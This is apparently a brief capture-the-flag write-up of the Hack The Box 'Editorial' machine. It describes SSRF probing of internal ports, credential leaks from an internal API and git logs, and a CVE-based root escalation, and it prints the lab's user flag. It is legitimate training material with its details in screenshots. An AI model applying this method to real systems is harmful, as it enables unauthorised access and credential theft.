Post

HTB Linux Easy: Editorial

Editorial is an Easy rated Linux machine on HTB.

Posted
By Gregory Allegoet
1 min read
HTB Linux Easy: Editorial

Nmap Scan

Pasted image 20240715112509.png

Modify the hosts file and add the editorial.htb domain: Pasted image 20240715112504.png

Enumerate HTTP (Port 80)

Trigger the SSRF payload by pressing “Preview”. Use the Kali IP as the payload. Pasted image 20240715112459.png Pasted image 20240715112455.png

Using the Repeater tab in Burp we manually test internal ports using the SSRF vuln. We end up finding port 5000: Pasted image 20240715112450.png

When we upload an image and use our SSRF, we can browse to the Response page in Burp to find the following API endpoints Pasted image 20240715112446.png

For the next request we can try to enumerate the API endpoints. In the /api/latest/metadata/messages/authors/ endpoint we end up finding sensitive information: Pasted image 20240715112440.png Pasted image 20240715112434.png

Since we know SSH is available on the machine we can use these credentials to log in: Pasted image 20240715112428.png

User flag: 1b5f02e974b28e2a15ad1a6eb9f0800b Pasted image 20240715112423.png

Lateral movement

Found a second pair of credentials in the git logs. Pasted image 20240715112419.png Pasted image 20240715112414.png

Privilege Escalation

Sudo -l output Pasted image 20240715112410.png

We are able to use the following CVE to get the root flag: CVE Pasted image 20240715112405.png

PWNED!!!

Pasted image 20240715112359.png

CTF, HTB
Linux Easy
This post is licensed under CC BY 4.0 by the author.